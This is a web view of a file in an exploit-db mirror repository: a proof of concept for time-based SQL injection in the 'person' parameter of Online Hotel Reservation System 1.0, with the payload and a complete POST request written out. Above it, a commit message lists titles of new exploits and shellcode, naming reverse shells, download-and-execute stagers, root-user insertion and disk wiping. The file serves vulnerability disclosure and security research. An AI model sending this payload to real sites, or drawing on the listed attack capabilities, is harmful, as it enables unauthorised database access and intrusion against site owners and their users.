bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/49431.txt
Offensive Security 969e7d6c90 DB: 2021-01-16 
13 changes to exploits/shellcodes

Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS
E-Learning System 1.0 - Authentication Bypass & RCE POC
Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit)
PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message)
WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS)
Online Hotel Reservation System 1.0 - 'description' Stored Cross-site Scripting
Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection
Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF)
Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection
EyesOfNetwork 5.3 - File Upload Remote Code Execution

BSD/x86 - execve(/bin/sh) Encoded Shellcode (49 bytes)
BSD/x86 - execve(/bin/sh) + Encoded Shellcode (49 bytes)
FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)
FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)
FreeBSD x86/x64 - execve(/bin/sh) + Anti-Debugging Shellcode (140 bytes)
FreeBSD/x86 - setreuid() + execve(pfctl -d) Shellcode (56 bytes)

FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes)
FreeBSD/x86 - execve(/bin/sh) + Encoded Shellcode (48 bytes)

Linux/PPC - read + exec Shellcode (32 bytes)
Linux/PPC - read() + exec Shellcode (32 bytes)

Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)
Linux/x86 - Append RSA Key To /root/.ssh/authorized_keys2 Shellcode (295 bytes)

Linux/x86 - Reverse (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)
Linux/x86 - Reverse (140.115.53.35:9999/TCP) + Download File (cb) + Execute Shellcode (149 bytes)

Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)
Linux/x86 - Reverse PHP (Writes To /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)

Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)
Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive + Payload Loader Shellcode (68+ bytes)

BSD/x86 - symlink . /bin/sh Shellcode (32 bytes)
BSD/x86 - symlink /bin/sh Shellcode (32 bytes)

Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)
Linux/x86 - Overwrite MBR On /dev/sda With _LOL!' Shellcode (43 bytes)

Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes)
Linux/x86 - Add Root User (toor) To /etc/passwd + No Password + exit() Shellcode (107 bytes)

Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)
Linux/x86 - execve(_/bin/sh__ _0__ _0_) With umask 16 (sys_umask(14)) Shellcode (45 bytes)

Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)
Linux/x64 - setuid(0) + chmod (/etc/passwd 0777) + exit(0) Shellcode (63 bytes)
Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes)
Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)
Linux/ARM - chmod(/etc/shadow 0777) + Polymorphic Shellcode (84 bytes)
Linux/ARM - chmod(/etc/shadow 0777) Shellcode (35 bytes)

Linux/x86 - Bind (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)
Linux/x86 - Bind (6778/TCP) Shell + Polymorphic + XOR Encoded Shellcode (125 bytes)

Linux/ARM - Bind (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode
Linux/ARM - Bind (0x1337/TCP) Listener + Receive + Payload Loader Shellcode

Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)
Linux/SuperH (sh4) - setuid(0) + chmod (/etc/shadow 0666) + exit(0) Shellcode (43 bytes)

Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)
Windows - Download File + Execute Via DNS + IPv6 Shellcode (Generator) (Metasploit)

Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)
Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)

Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid() + Execute /bin/bash Obfuscated Shellcode (521 bytes)

Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)
Linux/x86 - Add Map (127.1.1.1 google.com) To /etc/hosts Shellcode (77 bytes)

Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (77-85/90-98 bytes)
Windows/x64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)
Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)
Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)
Windows/x64 (XP) - Download File + Execute Shellcode Using PowerShell (Generator)
Linux/MIPS (Little Endian) - chmod(/etc/shadow 666) Shellcode (55 bytes)
Linux/MIPS (Little Endian) - chmod(/etc/passwd 666) Shellcode (55 bytes)

Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes)
Linux/x86 - execve(/bin/sh) + ROT13 Encoded Shellcode (68 bytes)

Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)
Linux/x86 - Add Map (127.1.1.1 google.com) To /etc/hosts + Obfuscated Shellcode (98 bytes)

Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)
Linux/x86 - Custom execve() + 'Followtheleader' Shellcode (Encoder/Decoder) (Generator)

Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)
Linux/x86 - mkdir(HACK) + chmod 777 + exit(0) Shellcode (29 bytes)

Linux/x86 - Reboot() Shellcode (28 bytes)
Linux/x86 - reboot() Shellcode (28 bytes)

Linux/x64 - execve() Encoded Shellcode (57 bytes)
Linux/x64 - execve() + Encoded Shellcode (57 bytes)

Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)
Windows/x86 - Download File (//192.168.1.19/c) Via WebDAV + Execute Null-Free Shellcode (96 bytes)

Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)
Windows - Keylogger To File (./log.bin) + Null-Free Shellcode (431 bytes)

Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)
Windows - Keylogger To File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)

BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)
BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator)

Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)
Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing Via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)
BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)
Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)
BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 bytes)
BSD/x86 - Write To /etc/passwd With uid(0) + gid(0) Shellcode (74 bytes)
Linux/x86 - Write To /etc/passwd With uid(0) + gid(0) Shellcode (74 bytes)
BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (31 bytes)

Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes)
Linux/x86 - Audio (knock knock knock) Via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes)

Linux/x86 - Remote File Download Shellcode (42 bytes)
Linux/x86 - Download File Shellcode (42 bytes)

Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes)
Linux/x86 - reboot() + Mutated + Null-Free Shellcode (55 bytes)

Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes)
Linux/x86 - execve(wget) + Mutated + Null-Free Shellcode (96 bytes)
Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes)
Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)
Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)
Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + Execute Shellcode (108 bytes)
Linux/x86 - execve(/bin/sh) Using jump/call/pop Shellcode (52 bytes)
Linux/x86 - Copy /etc/passwd To /tmp/outfile Shellcode (97 bytes)

Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)
Linux/x64 - execve(/bin/sh -c reboot) Shellcode (89 bytes)

Linux/x64 - mkdir() Shellcode (25 bytes)
Linux/x64 - mkdir(ajit) Shellcode (25 bytes)

IRIX - Bind (/TCP)Shell (/bin/sh) Shellcode (364 bytes)
IRIX - Bind (/TCP) Shell (/bin/sh) Shellcode (364 bytes)
Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)
Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)
Linux/ARM - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (79 bytes)
Linux/ARM - chmod(/etc/passwd 0777) Shellcode (39 bytes)

Linux/x64 - Execute /bin/sh Shellcode (27 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (27 bytes)
Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)
Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)
Linux/x64 - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (110 bytes)
Linux/x64 - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (96 bytes)
Linux/x64 - shutdown -h now Shellcode (65 bytes)
Linux/x64 - shutdown -h now Shellcode (64 bytes)
Linux/x64 - /sbin/shutdown -h now Shellcode (65 bytes)
Linux/x64 - /sbin/shutdown -h now Shellcode (64 bytes)
Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode
Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)
Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode
Linux/x86 - NOT Encoder / Decoder - execve(/bin/sh) Shellcode (44 bytes)
Linux/x64 - execve(/bin/sh) + Custom Encoded XOR Shellcode
Linux/x64 - execve(/bin/sh)  + Custom Encoded XOR + Polymorphic Shellcode (Generator)
Linux/x64 - execve(/bin/sh) + Twofish Encoded + DNS (CNAME) Password + Shellcode
Linux/x86 - execve(/bin/sh) + NOT Encoder / Decoder Shellcode (44 bytes)

Linux/x64 - x64 Assembly Shellcode (Generator)
Linux/x64 - execve() Assembly Shellcode (Generator)

Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)
Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (37 bytes)

Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + (Dual IPv4 and IPv6) Shellcode (146 bytes)
Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + IPv4/6 Shellcode (146 bytes)
Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)
Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)
Linux/ARM -  execve(_/bin/sh__ NULL_ NULL) + read(0_ buf_ 0xff) Stager Shellcode (28 Bytes)
Linux/ARM - execve(_/bin/sh__ NULL_ NULL) + read(0_ buf_ 0xff) Stager  Shellcode (20 Bytes)

Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)
Linux/x86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)

Linux/ARM - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (4 Bytes)
Linux/ARM -  execve(_/bin/sh__ NULL_ NULL) + Jump Back Shellcode (4 Bytes)

Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP (192.168.2.157/31337) Shellcode (181 bytes)
Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse (192.168.2.157:31337/TCP) Shellcode (181 bytes)

Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)
Linux/x86 - execve(/usr/bin/head -n99 cat etc/passwd) Shellcode (61 Bytes)
Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + execute Shellcode (119 bytes)
Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator)
Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + Execute Shellcode (119 bytes)
Windows/x86 (XP Pro SP3) - Download File Via TFTP + Execute Shellcode (51-60 bytes) (Generator)
Linux/ARM - Reverse TCP (192.168.1.124:4321) Shell (/bin/sh) Shellcode (64 bytes)
Windows/x86 - 'msiexec.exe' Download and Execute Shellcode (95 bytes)
Linux/ARM - Reverse (192.168.1.124:4321/TCP) Shell (/bin/sh) Shellcode (64 bytes)
Windows/x86 - Download File (http://192.168.0.13/ms.msi) Via msiexec + Execute Shellcode (95 bytes)

Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)
Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes)

Linux/x86 - Add User (sshd/root) to /etc/passwd Shellcode (149 bytes)
Linux/x86 - Add User (sshd/root) To /etc/passwd Shellcode (149 bytes)

Linux/x86 - cat (.bash_history)+ base64 Encode + curl data (http://localhost:8080) Shellcode (125 bytes)
Linux/x86 - cat .bash_history + base64 Encode + cURL (http://localhost:8080) Shellcode (125 bytes)

Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) + Generator Shellcode (91 Bytes)
Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) Shellcode (91 Bytes) (Generator)

Linux/x86 - Shred file (test.txt) Shellcode (72 bytes)
Linux/x86 - Shred File (test.txt) Shellcode (72 bytes)

Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (23 bytes)

Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)
Linux/x86 -  execve(/bin/sh)  + Reposition + INC Encoder Shellcode (66 bytes)

Windows/x86 - bitsadmin Download and Execute (http://192.168.10.10/evil.exe _c:\evil.exe_) Shellcode (210 Bytes)
Windows/x86 - Download File (http://192.168.10.10/evil.exe _c:\evil.exe_) Via bitsadmin  + Execute Shellcode (210 Bytes)

Linux/x86 - Chmod + Execute (/usr/bin/wget http://192.168.1.93//x) + Hide Output Shellcode (129 bytes)
Linux/x86 - chmod + execute(/usr/bin/wget http://192.168.1.93//x) + Hide Output Shellcode (129 bytes)

Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes)
Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (140 bytes)
Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)
Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)
Linux/ARM64 -  execve(_/bin/sh__ NULL_ NULL) + mmap() + read() Stager Shellcode (60 Bytes)
Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) + Jump Back Shellcode (8 Bytes)

Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) Using JMP-CALL-POP Shellcode (21 bytes)
Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode (168 bytes)
Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes)
Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes)
Linux/x86 - execve(/bin/sh)  + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes)
Linux/x86 - chmod(/etc/shadow_ 0666) + Polymorphic Shellcode (53 bytes)
Linux/x86 -  Disable ASLR Security  + Polymorphic Shellcode (107 bytes)

Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes)
Linux/x86_64 - execve(_/bin/sh_) + AVX2 XOR Decoder Shellcode (62 bytes)
Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes)
Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)
Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)
Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (107 Bytes)
Linux/x86 - Bind (43690/TCP) + Null-Free Shellcode (53 Bytes)
Linux/x86 - execve(/bin/sh)  + NOT + XOR-N + Random Encoded Shellcode (132 bytes)
Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)
Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (91 bytes)
Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)
Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Byte Free Shellcode (188 bytes)
Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)
Windows/7 - Screen Lock Shellcode (9 bytes)
Linux/x86 - Add Root User (vl43ck/test) To /etc/passwd Shellcode (59 bytes)
Linux/x86 - adduser (User) To /etc/passwd Shellcode (74 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)
Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (91 bytes)
Linux/x86 - execve(/bin/sh) Socket Reuse Shellcode (42 bytes)
Linux/x86 - execve(/bin/sh) + NOT|ROT+8 Encoded + Null-Free Shellcode (47 bytes)
Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Free Shellcode (188 bytes)
Linux/x86 - execve() + Alphanumeric Shellcode (66 bytes)
Linux/x86 - execve(/bin/sh) + Random Bytes Encoder + XOR/SUB/NOT/ROR Shellcode (114 bytes)
Windows/x64 (7) - Screen Lock Shellcode (9 bytes)

Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)
Windows/x86 - WinExec Calc.exe +  Null-Free Shellcode (195 bytes)

Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)
Linux/x86 - Reboot + Polymorphic Shellcode (26 bytes)
Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
Linux/ARM - execve /bin/dash Shellcode (32 bytes)
Windows/x86 - MSVCRT System + Dynamic Null-Free + Add RDP Admin (MajinBuu/TurnU2C@ndy!!) + Disable Firewall + Enable RDP Shellcode (644 Bytes)
Linux/x64 - Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Password (P3WP3Wl4ZerZ) + Null-free Shellcode (272 Bytes)
Linux/ARM - execve(/bin/dash) Shellcode (32 bytes)

Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)
Linux/x86 -  Disable ASLR Security + Polymorphic Shellcode (124 bytes)

Windows/x86 - Download using mshta.exe Shellcode (100 bytes)
Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)
2021-01-16 05:01:56 +00:00

34 lines
No EOL
1.4 KiB
Text
Raw Blame History

# Exploit Title: Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection
# Exploit Author: Mesut Cetin
# Date: 2021-01-15
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0
######## Description ########
The 'person' parameter is vulnerable to time-based SQL Injection.
######## Proof of Concept #######
Payload: (select*from(select(sleep(10)))a)
Using Burp Suite, send the following POST request:
POST /marimar/index.php?p=booking HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://localhost
Connection: close
Referer: http://localhost/marimar/index.php?p=booking
Cookie: PHPSESSID=cf40af0022f401c8cfd0be17fc00a6cc
Upgrade-Insecure-Requests: 1
arrival=01%2F19%2F2021&departure=01%2F11%2F2021&person=(select*from(select(sleep(10)))a)&accomodation=0
Reference in a new issue View git blame Copy permalink